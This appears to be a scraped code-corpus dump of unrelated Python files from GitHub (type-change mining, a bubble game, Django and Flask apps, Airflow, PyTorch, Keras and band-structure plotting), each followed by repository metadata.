return readAll("Projects", "Project", pathToProtos=os.path.join(path, "ProtosOut"))
def get_details_of_commits_with_type_change(project, pathToTypeChangeCommit):
return readAll("TypeChangeCommit_" + project.name, "TypeChangeCommit", pathToProtos=pathToTypeChangeCommit)
def get_dependency_affected(commitInfo):
deps = {}
dependencyUpdate = commitInfo.dependencyUpdate
if len(dependencyUpdate.update) > 0:
deps['Updated'] = list(map(lambda u: "->".join([prettyJarInfo(u.before), prettyJarInfo(u.after)]),
dependencyUpdate.update))
if len(dependencyUpdate.added) > 0:
deps['Added'] = list(map(lambda u: prettyJarInfo(u), dependencyUpdate.added))
if len(dependencyUpdate.removed) > 0:
deps['Removed'] = list(map(lambda u: prettyJarInfo(u), dependencyUpdate.removed))
return deps
def convert(pathToSetup):
pathToJson = pathToSetup
commits = {}
typeChangeDict = {}
for p in get_all_projects(os.path.join(pathToSetup, 'Input'))[:2]:
commit_details = get_details_of_commits_with_type_change(p, os.path.join(pathToSetup, 'Output'))
print()
for cmt in commit_details:
commit_Info = {'sha': cmt.sha, 'project': p.name,
'GitHub_URL': p.url,
'Dependencies': get_dependency_affected(cmt),
'Refactoring': cmt.refactorings._values
}
commits[cmt.sha]= commit_Info
for typeChange in cmt.typeChanges:
instances = []
for instance in typeChange.typeChangeInstances:
mappings = []
for mapping in instance.codeMapping:
replacements = []
for repl in mapping.replcementInferred:
repl_info = {"Before": repl.b4, "After": repl.aftr, "Replacement label": repl.replacementType}
replacements.append(repl_info)
mapping_info = {'IsSame': mapping.isSame, 'Prev Code Snippet': mapping.b4
, 'After Code Snippet': mapping.after
, 'Prev Code snippet url': mapping.urlbB4
, 'After Code snipper url': mapping.urlAftr
, 'Replacements': replacements}
mappings.append(mapping_info)
instance_info = {'From Type': pretty(instance.b4), 'To Type': pretty(instance.aftr)
, 'Element name before': instance.nameB4
, 'Element name after': instance.nameAfter
, 'Element kind affected': prettyElementKind(instance.elementKindAffected)
, 'Visibility of the element': instance.visibility
, 'Syntactic Transformation of type ast': instance.syntacticUpdate.transformation
, 'Github URL of element before': instance.urlB4
, 'Github URL of element after': instance.urlAfter
, 'Adaptations': mappings}
instances.append(instance_info)
typeChange_info = {'sha': cmt.sha, 'project': p.name
, 'From Type': pretty(typeChange.b4), 'To Type': pretty(typeChange.aftr)
, 'Number of Instances': len(typeChange.typeChangeInstances)
, 'Namespace of From Type': prettyNameSpace1(typeChange.nameSpacesB4)
, 'Namespace of To Type': prettyNameSpace1(typeChange.nameSpaceAfter)
, 'Hierarchy Relation': typeChange.hierarchyRelation
, 'Does from type composes To type': typeChange.b4ComposesAfter
, 'Primitive widening': typeChange.primitiveInfo.widening
, 'Primitive narrowing': typeChange.primitiveInfo.narrowing
, 'Primitive unboxing': typeChange.primitiveInfo.unboxing
, 'Primitive boxing': typeChange.primitiveInfo.boxing
, 'Instances': instances}
typeChangeDict.setdefault('->'.join([typeChange_info['From Type'], typeChange_info['To Type']]), [])\
.append(typeChange_info)
with open(os.path.join(pathToJson, "commitInfo.json"), "w+") as outfile:
json.dump(commits, outfile)
with open(os.path.join(pathToJson, "typeChange.json"), "w+") as outfile:
json.dump(typeChangeDict, outfile)
convert(sys.argv[1]) | ameyaKetkar/TypeChangeMiner | scripts/ProtosToJson.py | ProtosToJson.py | py | 4,967 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "RW.readAll",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "RW.readAll",
"line_number": ... |
4472055866 | from math import sin, cos
from components.bubble import Bubble
from components.utils import HF
from data.constants import CONFUSION_COLORS
class EnemyEvent:
def __init__(self, owner, game, data: dict):
self.owner = owner
self.game = game
self.trigger_value = data["trigger value"]
self.action = self.set_action(data["action"])
self.hit = False
self.value = data["value"]
def set_action(self, action: str):
if action == "event bubbles":
return self.drop_bubble
if action == "change speed":
return self.change_speed
if action == "spawn enemies":
return self.spawn_enemies
if action == "enemy split":
return self.enemy_split
if action == "change color":
return self.change_color
return lambda: None
def drop_bubble(self):
bubble = Bubble(self.game.rect, self.owner.x, self.owner.y,
gravitation_radius=self.game.room.gravitation_radius)
self.game.room.bubbles.append(bubble)
def change_speed(self):
self.owner.velocity = HF(self.value)
def spawn_enemies(self):
for _ in range(self.value[1]):
self.game.room.spawn_enemy(self.value[0], self.owner.x, self.owner.y)
def enemy_split(self):
x, y, angle = self.owner.x, self.owner.y, self.owner.body.angle
dx = HF(58.44) * sin(angle)
dy = HF(58.44) * cos(angle)
self.game.room.spawn_enemy("Twin", x + dx, y + dy, angle)
self.game.room.spawn_enemy("Twin", x - dx, y - dy, angle)
def change_color(self):
color_1, color_2, color_3 = CONFUSION_COLORS[self.owner.health % 10]
circle = self.owner.body.current_circles[0]
circle.color = color_1
circle.glares[0].color = circle.glares[1].color = circle.edge_color = color_2
circle.glares[2].color = circle.glares[3].color = color_3
__all__ = ["EnemyEvent"]
| IldarRyabkov/BubbleTanks2 | src/components/enemy_event.py | enemy_event.py | py | 1,981 | python | en | code | 37 | github-code | 36 | [
{
"api_name": "data.constants",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "data.constants",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "data.constants",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "components.bubble.Bubble... |
73881050665 | import six
from sse.exceptions import SseException
__all__ = ['MethodNotAllowed', 'NotFound']
class StreamProtocolException(SseException):
"""
To avoid confusing with class naming or maybe I need some brain surgery
"""
def __init__(self, **kwargs):
for key, value in six.iteritems(kwargs):
if not hasattr(self, key):
raise TypeError("%s() received an invalid keyword %r."
"only accepts arguments that are already "
"attributes of the exception class." % (self.__class__.__name__, key))
setattr(self, key, value)
class MethodNotAllowed(StreamProtocolException):
status = 405
def __init__(self, methods, **kwargs):
self.headers = (
('Allow', '/'.join(m.upper() for m in methods)),
)
super().__init__(**kwargs)
class NotFound(StreamProtocolException):
status = 404
| Axik/instamute.io | apps/stream/exceptions.py | exceptions.py | py | 974 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sse.exceptions.SseException",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "six.iteritems",
"line_number": 12,
"usage_type": "call"
}
] |
37393924840 | from django.urls import path
from . import views
app_name = 'tenants'
urlpatterns = [
path('', views.index, name='index'),
path('device_network/', views.device_network, name='device_network'),
path('device_location/', views.device_location, name='device_location'),
path('device/', views.device, name='device'),
path('sensor/', views.sensor, name='sensor'),
path('org_user/', views.org_user, name='org_user'),
path('profile/', views.profile, name='profile'),
path('users/', views.users, name='users'),
path('networks/', views.networks, name='networks'),
path('locations/', views.locations, name='locations'),
path('devices/', views.devices, name='devices'),
path('sensors/', views.sensors, name='sensors'),
path('update_network/<int:network_id>/', views.update_network, name='update_network'),
path('update_location/<int:location_id>/', views.update_location, name='update_location'),
path('update_device/<int:device_id>/', views.update_device, name='update_device'),
path('update_sensor/<int:sensor_id>/', views.update_sensor, name='update_sensor'),
path('delete_entry', views.delete_entry, name='delete_entry'),
path('change_password', views.change_password, name='change_password'),
]
| Being-rayhan/iot | tenants/urls.py | urls.py | py | 1,265 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
17956410019 | import pygame as pg
from random import random as r
from neurobiba import Weights, load_weights, save_weights
import copy
import itertools
W, H, size = 100, 60, 10
pg.init()
screen = pg.display.set_mode((W*size, H*size), 0, 32)
pg.display.set_caption('CYBERBIBA')
def update():
nn = Weights([27,3])
canvas1 = [[[r(),r(),r()] for y in range(H)] for x in range(W)]
canvas2 = copy.deepcopy(canvas1)
return nn, canvas1, canvas2
nn, canvas1, canvas2 = update()
is_running = True
while is_running:
for event in pg.event.get():
if event.type == pg.QUIT:
is_running = False
if event.type == pg.KEYDOWN:
if event.key == pg.K_r:
nn, canvas1, canvas2 = update()
if event.key == pg.K_s:
save_weights(nn, "weights")
if event.key == pg.K_l:
nn, canvas1, canvas2 = update()
nn = load_weights("weights")
for x, i in enumerate(canvas1):
for y, _ in enumerate(i):
neighbors = [canvas1[(x+dx-1)%W][(y+dy-1)%H] for dy in range(3) for dx in range(3)]
neighbors = list(itertools.chain(*neighbors))
result = nn.feed_forward(neighbors)
canvas2[x][y] = result
color = tuple(map(lambda x: int(x*255),result))
screen.fill(color, (x*size, y*size, size, size))
canvas1, canvas2 = canvas2, canvas1
pg.display.flip()
| displaceman/neurobiba | examples/neural cellular automata/neuroautomata.py | neuroautomata.py | py | 1,435 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "pygame.init",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_mode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "pygame.display... |
35396799058 | from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
from contextlib import contextmanager
import tempfile
from pex.pex_builder import PEXBuilder
from twitter.common.collections import OrderedSet
from pants.backend.core.tasks.task import Task
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.base.exceptions import TaskError
class PythonTask(Task):
@classmethod
def register_options(cls, register):
super(PythonTask, cls).register_options(register)
register('--timeout', type=int, default=0,
help='Number of seconds to wait for http connections.')
def __init__(self, *args, **kwargs):
super(PythonTask, self).__init__(*args, **kwargs)
self.conn_timeout = (self.get_options().timeout or
self.context.config.getdefault('connection_timeout'))
self._compatibilities = self.get_options().interpreter or [b'']
self._interpreter_cache = None
self._interpreter = None
@property
def interpreter_cache(self):
if self._interpreter_cache is None:
self._interpreter_cache = PythonInterpreterCache(self.context.config,
logger=self.context.log.debug)
# Cache setup's requirement fetching can hang if run concurrently by another pants proc.
self.context.acquire_lock()
try:
# We pass in filters=compatibilities because setting up some python versions
# (e.g., 3<=python<3.3) crashes, and this gives us an escape hatch.
self._interpreter_cache.setup(filters=self._compatibilities)
finally:
self.context.release_lock()
return self._interpreter_cache
@property
def interpreter(self):
"""Subclasses can use this if they're fine with the default interpreter (the usual case)."""
if self._interpreter is None:
self._interpreter = self.select_interpreter(self._compatibilities)
return self._interpreter
def select_interpreter_for_targets(self, targets):
"""Pick an interpreter compatible with all the specified targets."""
allowed_interpreters = OrderedSet(self.interpreter_cache.interpreters)
targets_with_compatibilities = [] # Used only for error messages.
# Constrain allowed_interpreters based on each target's compatibility requirements.
for target in targets:
if target.is_python and hasattr(target, 'compatibility') and target.compatibility:
targets_with_compatibilities.append(target)
compatible_with_target = list(self.interpreter_cache.matches(target.compatibility))
allowed_interpreters &= compatible_with_target
if not allowed_interpreters:
# Create a helpful error message.
unique_compatibilities = set(tuple(t.compatibility) for t in targets_with_compatibilities)
unique_compatibilities_strs = [','.join(x) for x in unique_compatibilities if x]
targets_with_compatibilities_strs = [str(t) for t in targets_with_compatibilities]
raise TaskError('Unable to detect a suitable interpreter for compatibilities: %s '
'(Conflicting targets: %s)' % (' && '.join(unique_compatibilities_strs),
', '.join(targets_with_compatibilities_strs)))
# Return the lowest compatible interpreter.
return self.interpreter_cache.select_interpreter(allowed_interpreters)[0]
def select_interpreter(self, filters):
"""Subclasses can use this to be more specific about interpreter selection."""
interpreters = self.interpreter_cache.select_interpreter(
list(self.interpreter_cache.matches(filters)))
if len(interpreters) != 1:
raise TaskError('Unable to detect a suitable interpreter.')
interpreter = interpreters[0]
self.context.log.debug('Selected %s' % interpreter)
return interpreter
@contextmanager
def temporary_pex_builder(self, interpreter=None, pex_info=None, parent_dir=None):
"""Yields a PEXBuilder and cleans up its chroot when it goes out of context."""
path = tempfile.mkdtemp(dir=parent_dir)
builder = PEXBuilder(path=path, interpreter=interpreter, pex_info=pex_info)
yield builder
builder.chroot().delete()
| fakeNetflix/square-repo-pants | src/python/pants/backend/python/tasks/python_task.py | python_task.py | py | 4,295 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pants.backend.core.tasks.task.Task",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "pants.backend.python.interpreter_cache.PythonInterpreterCache",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "twitter.common.collections.OrderedSet",
"lin... |
25523783356 | import os
from flask import Flask, make_response, request, redirect, url_for, send_from_directory
from werkzeug.utils import secure_filename
from database import app
UPLOAD_FOLDER = './uploads'
ALLOWED_EXTENSIONS = { 'png', 'jpg', 'mp3' } #to change for music files
app.config['UPLOAD_FOLDER'] = os.path.join(os.getcwd(), "file_transfer/uploads")
print(os.getcwd())
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/file/<filename>', methods = ['GET'])
def file_download(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename, as_attachment=True)
@app.route('/file', methods = ['POST'])
def file_upload():
if 'file' not in request.files:
return "ERROR : No file part", 404
file = request.files['file']
if file.filename == '':
return "ERROR : No selected file", 401
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return "File Successfully Uploaded"
#request.files
@app.route('/file/<filename>', methods = ['DELETE'])
def delete_items(filename):
os.remove(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return "File Successfully Deleted"
@app.errorhandler(401)
@app.errorhandler(404)
@app.errorhandler(500)
def ma_page_erreur(error):
return "Error {}".format(error.code), error.code
if __name__ == "__main__":
app.run()
| arkea-tech/YEP_EpiKodi3_2020 | server/file_transfer/views.py | views.py | py | 1,512 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "database.app.config",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "database.app",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_n... |
5762295604 | import os
import sys
from datetime import datetime, timedelta
from airflow.models import DAG
from airflow.operators.python import PythonOperator
from airflow.utils.dates import days_ago
PARENT_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
)
sys.path.append(PARENT_DIR)
from codes.test import add, sub
default_args = {
"owner": "airflow",
}
with DAG(
dag_id="aflow_dag",
description="Datalake to datawarehouse creation",
default_args=default_args,
# schedule_interval="@daily",
schedule_interval=None,
start_date=days_ago(2),
tags=["aflow", "dwh", "datalake", "etl/elt"],
) as dag:
add = PythonOperator(
task_id="add", python_callable=add,
)
sub = PythonOperator(
task_id="sub", python_callable=sub,
)
add >> sub | bhuiyanmobasshir94/Apache-Airflow-Starter | airflow/dags/aflow_dag.py | aflow_dag.py | py | 823 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_numb... |
34743814847 | from typing import List
file = "input02.txt"
with open(file, "rt") as f:
ids = f.readlines()
# Part 1
doubles = 0
triples = 0
for id in ids:
double_found = False
triple_found = False
for c in id:
reps = id.count(c)
if reps == 2 and not double_found:
doubles += 1
double_found = True
if reps == 3 and not triple_found:
triples += 1
triple_found = True
if double_found and triple_found:
break
print(f"Number of doubles: {doubles}")
print(f"Number of triples: {triples}")
print(f"Checksum: {doubles*triples}")
# Part 2
def check(x: str, y: str) -> bool:
"""
Whether two strings differ at most at one position
"""
if not x:
return not y
x0, x_tail = x[0], x[1:]
y0, y_tail = y[0], y[1:]
return (x_tail == y_tail) or (x0 == y0 and check(x_tail, y_tail))
def find_ids(ids: List[str]) -> str:
for i, x in enumerate(ids[:-1]):
for y in ids[i + 1:]:
found = check(x, y)
if found:
print(f"The found ids: {x}, {y}")
common_sub = ""
for i, c in enumerate(x):
if y[i] == c:
common_sub += c
return(common_sub)
raise ValueError("No correct ids were found")
res = find_ids(ids)
print(f"The common substring: {res}")
| acanizares/advent_of_code | day02.py | day02.py | py | 1,405 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 45,
"usage_type": "name"
}
] |
12859158519 | import torch
import numpy as np
import matplotlib.pyplot as plt
print("PyTorch Version:", torch.__version__)
if torch.backends.mps.is_available():
mps_device = torch.device("mps")
print(mps_device)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
X, Y = np.mgrid[-4.0:4:0.01, -4.0:4:0.01]
x = torch.Tensor(X)
y = torch.Tensor(Y)
x = x.to(device)
y = y.to(device)
z = torch.sin(3*x + y) * torch.exp(-(x**2+y**2)/2.0)
plt.imshow(z.numpy())
plt.tight_layout()
plt.show()
| rwardd/comp3710 | prac1/gaussian.py | gaussian.py | py | 509 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.__version__",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.backends.mps.is_available",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.backends",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name"... |
21374477352 | from django import template
register = template.Library()
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
@register.filter
def first_letter_word(value):
stop_words = set(stopwords.words('english'))
word_tokens = word_tokenize(value)
filtered_sentence = [w for w in word_tokens if not w.lower() in stop_words]
removetable = str.maketrans('', '', '!@#$%^&*()_+-=[]{};:\"\',./<>?\|')
final = [s.translate(removetable) for s in filtered_sentence]
final = [s for s in final if s != '']
chindex=1
arr = []
for letter in final:
if chindex==1:
arr.append(letter[0].upper())
else:
arr.append(letter)
out = "".join(arr)
return out | 4akhilkumar/akira_project | akira_apps/staff/templatetags/first_letter_word.py | first_letter_word.py | py | 744 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.template.Library",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "django.template",
"line_number": 2,
"usage_type": "name"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "nlt... |
22017042868 | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 15 11:48:04 2020
@author: Paradeisios
"""
from utils.computeCost import computeCost
import numpy as np
def gradientDescent(X,y,theta,alpha, iterations):
m = len(y)
J_history = np.zeros((iterations,1))
derivative = 0
for i in range(iterations):
derivative = (X.dot(theta) - y).dot(X)
theta = theta - alpha*(1/m)*derivative
J_history[i]= computeCost(theta,X,y)
return(theta,J_history)
| paradeisios/Coursera_Machine_Learning | week2/python/utils/gradientDescent.py | gradientDescent.py | py | 514 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "utils.computeCost.computeCost",
"line_number": 20,
"usage_type": "call"
}
] |
42356364206 | import os
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping
from utils.callbacks import ModelCheckpoint, TimeHistory
from engine.metrics import (jaccard_index, jaccard_index_softmax, IoU_instances,
instance_segmentation_loss, weighted_bce_dice_loss)
def prepare_optimizer(cfg, model):
"""Select the optimizer, loss and metrics for the given model.
Parameters
----------
cfg : YACS CN object
Configuration.
model : Keras model
Model to be compiled with the selected options.
"""
assert cfg.TRAIN.OPTIMIZER in ['SGD', 'ADAM']
assert cfg.LOSS.TYPE in ['CE', 'W_CE_DICE']
# Select the optimizer
if cfg.TRAIN.OPTIMIZER == "SGD":
opt = tf.keras.optimizers.SGD(lr=cfg.TRAIN.LR, momentum=0.99, decay=0.0, nesterov=False)
elif cfg.TRAIN.OPTIMIZER == "ADAM":
opt = tf.keras.optimizers.Adam(lr=cfg.TRAIN.LR, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
# Compile the model
if cfg.PROBLEM.TYPE == "CLASSIFICATION":
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=["accuracy"])
elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
if cfg.MODEL.N_CLASSES > 1:
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=[jaccard_index_softmax])
else:
model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
if cfg.MODEL.N_CLASSES > 1:
raise ValueError("Not implemented pipeline option: N_CLASSES > 1 and INSTANCE_SEG")
else:
if cfg.DATA.CHANNELS in ["BC", "BCM"]:
model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
else:
if cfg.DATA.CHANNELS == "Dv2":
model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
metrics=["mse"])
else:
bin_channels = 2 if cfg.DATA.CHANNELS in ["BCD", "BCDv2"] else 1
model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
metrics=[IoU_instances(binary_channels=bin_channels)])
elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
model.compile(optimizer=opt, loss=weighted_bce_dice_loss(w_dice=0.66, w_bce=0.33), metrics=[jaccard_index])
elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
raise ValueError("Not implemented pipeline option: LOSS.TYPE == W_CE_DICE and INSTANCE_SEG")
def build_callbacks(cfg):
"""Create training and validation generators.
Parameters
----------
cfg : YACS CN object
Configuration.
Returns
-------
callbacks : List of callbacks
All callbacks to be applied to a model.
"""
callbacks = []
# To measure the time
time_callback = TimeHistory()
callbacks.append(time_callback)
# Stop early and restore the best model weights when finished the training
earlystopper = EarlyStopping(patience=cfg.TRAIN.PATIENCE, verbose=1, restore_best_weights=True)
callbacks.append(earlystopper)
# Save the best model into a h5 file in case one need again the weights learned
os.makedirs(cfg.PATHS.CHECKPOINT, exist_ok=True)
checkpointer = ModelCheckpoint(cfg.PATHS.CHECKPOINT_FILE, verbose=1, save_best_only=True)
callbacks.append(checkpointer)
return callbacks
| lijunRNA/EM_Image_Segmentation | engine/__init__.py | __init__.py | py | 3,725 | python | en | code | null | github-code | 36 | [
{
"api_name": "tensorflow.keras.optimizers.SGD",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.keras.optimizers.Adam",
"line_number": 29,
"usage_type": "call"
},
{... |
192760992 | from flask import Flask, render_template, url_for, request, redirect
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
import requests
import paralleldots
import stripe
app = Flask(__name__)
pub_key = ''
secret_key = ''
stripe.api_key = secret_key
class Analyze:
report_key = ''
sentiment_key = ''
def __init__(self, company):
self.company = company
self.url = 'https://datafied.api.edgar-online.com/v2/corefinancials/ann?primarysymbols=' + \
self.company + '&appkey=' + self.report_key
def get_fin_report(self):
URL = self.url
PARAMS = {}
r = requests.get(url=URL, params=PARAMS)
self.data = r.json()
return None
def sentiment_analysis(self):
paralleldots.set_api_key(self.sentiment_key)
self.response = paralleldots.sentiment(self.data, 'en')
return None
def predict(self):
self.get_fin_report()
self.sentiment_analysis()
goodornot = self.response['sentiment']
result = max(goodornot, key=goodornot.get)
return result
# Route for handling the login page logic
@app.route('/', methods=['GET', 'POST'])
def index():
error = None
if request.method == 'POST':
return redirect(url_for('reallyobscurefilename'))
return render_template('index.html', error=error, pub_key = pub_key)
@app.route('/reallyobscurefilename', methods=['POST', 'GET'])
def reallyobscurefilename():
result = ''
if request.method == 'POST':
company = request.form['company']
new_analysis = Analyze(company=company)
ans = new_analysis.predict()
if ans in ['positive', 'neutral', 'negative']:
result = 'Our expert professional guidance is that this is a ' + \
ans + ' investment.'
return render_template('reallyobscurefilename.html', result = result)
if __name__ == "__main__":
app.run(debug=True) | mikeyj777/siraj_midterm_take3 | app.py | app.py | py | 1,955 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "stripe.api_key",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "paralleldots.set_api_key"... |
21365635224 | import numpy as np
from dptb.utils.tools import j_must_have
from dptb.utils.make_kpoints import ase_kpath, abacus_kpath, vasp_kpath
from ase.io import read
import ase
import matplotlib.pyplot as plt
import matplotlib
import logging
log = logging.getLogger(__name__)
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
class bandcalc(object):
def __init__ (self, apiHrk, run_opt, jdata):
self.apiH = apiHrk
if isinstance(run_opt['structure'],str):
self.structase = read(run_opt['structure'])
elif isinstance(run_opt['structure'],ase.Atoms):
self.structase = run_opt['structure']
else:
raise ValueError('structure must be ase.Atoms or str')
self.band_plot_options = jdata
self.results_path = run_opt.get('results_path')
self.apiH.update_struct(self.structase)
self.ref_band = self.band_plot_options.get("ref_band", None)
self.use_gui = self.band_plot_options.get("use_gui", False)
def get_bands(self):
kline_type = self.band_plot_options['kline_type']
if kline_type == 'ase':
kpath = self.band_plot_options['kpath']
nkpoints = self.band_plot_options['nkpoints']
self.klist, self.xlist, self.high_sym_kpoints, self.labels = ase_kpath(structase=self.structase,
pathstr=kpath, total_nkpoints=nkpoints)
elif kline_type == 'abacus':
kpath = self.band_plot_options['kpath']
self.labels = self.band_plot_options['klabels']
self.klist, self.xlist, self.high_sym_kpoints = abacus_kpath(structase=self.structase, kpath=kpath)
elif kline_type == 'vasp':
kpath = self.band_plot_options['kpath']
high_sym_kpoints_dict = self.band_plot_options['high_sym_kpoints']
number_in_line = self.band_plot_options['number_in_line']
self.klist, self.xlist, self.high_sym_kpoints, self.labels = vasp_kpath(structase=self.structase,
pathstr=kpath, high_sym_kpoints_dict=high_sym_kpoints_dict, number_in_line=number_in_line)
else:
log.error('Error, now, kline_type only support ase_kpath, abacus, or vasp.')
raise ValueError
all_bonds, hamil_blocks, overlap_blocks = self.apiH.get_HR()
self.eigenvalues, self.estimated_E_fermi = self.apiH.get_eigenvalues(self.klist)
if self.band_plot_options.get('E_fermi',None) != None:
self.E_fermi = self.band_plot_options['E_fermi']
log.info(f'set E_fermi from jdata: {self.E_fermi}, While the estimated value in line-mode is {self.estimated_E_fermi}')
else:
self.E_fermi = 0.0
log.info(f'set E_fermi = 0.0, While the estimated value in line-mode is {self.estimated_E_fermi}')
eigenstatus = {'klist': self.klist,
'xlist': self.xlist,
'high_sym_kpoints': self.high_sym_kpoints,
'labels': self.labels,
'eigenvalues': self.eigenvalues,
'E_fermi': self.E_fermi }
np.save(f'{self.results_path}/bandstructure',eigenstatus)
return eigenstatus
def get_HR(self):
all_bonds, hamil_blocks, overlap_blocks = self.apiH.get_HR()
return all_bonds, hamil_blocks, overlap_blocks
def band_plot(self):
matplotlib.rcParams['font.size'] = 7
matplotlib.rcParams['pdf.fonttype'] = 42
# plt.rcParams['font.sans-serif'] = ['Times New Roman']
emin = self.band_plot_options.get('emin')
emax = self.band_plot_options.get('emax')
fig = plt.figure(figsize=(4.5,4),dpi=100)
ax = fig.add_subplot(111)
band_color = '#5d5d5d'
# plot the line
if self.ref_band:
ref_eigenvalues = np.load(self.ref_band)
if len(ref_eigenvalues.shape) == 3:
ref_eigenvalues = ref_eigenvalues.reshape(ref_eigenvalues.shape[1:])
elif len(ref_eigenvalues.shape) != 2:
log.error("Reference Eigenvalues' shape mismatch.")
raise ValueError
if ref_eigenvalues.shape[0] != self.eigenvalues.shape[0]:
log.error("Reference Eigenvalues' should have sampled from the sample kpath as model's prediction.")
raise ValueError
ref_eigenvalues = ref_eigenvalues - (np.min(ref_eigenvalues) - np.min(self.eigenvalues))
nkplot = (len(np.unique(self.high_sym_kpoints))-1) * 7
nintp = len(self.xlist) // nkplot
if nintp == 0:
nintp = 1
band_ref = ax.plot(self.xlist[::nintp], ref_eigenvalues[::nintp] - self.E_fermi, 'o', ms=4, color=band_color, alpha=0.8, label="Ref")
band_pre = ax.plot(self.xlist, self.eigenvalues - self.E_fermi, color="tab:red", lw=1.5, alpha=0.8, label="DeePTB")
else:
ax.plot(self.xlist, self.eigenvalues - self.E_fermi, color="tab:red",lw=1.5, alpha=0.8)
# add verticle line
for ii in self.high_sym_kpoints[1:-1]:
ax.axvline(ii, color='gray', lw=1,ls='--')
# add shadow
# for i in range(self.eigenvalues.shape[1]):
# ax.fill_between(self.xlist, self.eigenvalues[:,i] - self.E_fermi, -2, alpha=0.05, color=band_color)
# add ticks
if not (emin is None or emax is None):
ax.set_ylim(emin,emax)
ax.set_xlim(self.xlist.min()-0.03,self.xlist.max()+0.03)
ax.set_ylabel('E - EF (eV)',fontsize=12)
ax.yaxis.set_minor_locator(MultipleLocator(1.0))
ax.tick_params(which='both', direction='in', labelsize=12, width=1.5)
ax.tick_params(which='major', length=6)
ax.tick_params(which='minor', length=4, color='gray')
# ax.set_yticks(None, fontsize=12)
ax.set_xticks(self.high_sym_kpoints, self.labels, fontsize=12)
ax.grid(color='gray', alpha=0.2, linestyle='-', linewidth=1)
ax.set_axisbelow(True)
fig.patch.set_facecolor('#f2f2f2')
fig.patch.set_alpha(1)
for spine in ax.spines.values():
spine.set_edgecolor('#5d5d5d')
spine.set_linewidth(1.5)
if self.ref_band:
plt.legend(handles=[band_pre[0], band_ref[0]], loc="best")
plt.tight_layout()
# remove the box around the plot
ax.set_frame_on(False)
plt.savefig(f'{self.results_path}/band.png',dpi=300)
if self.use_gui:
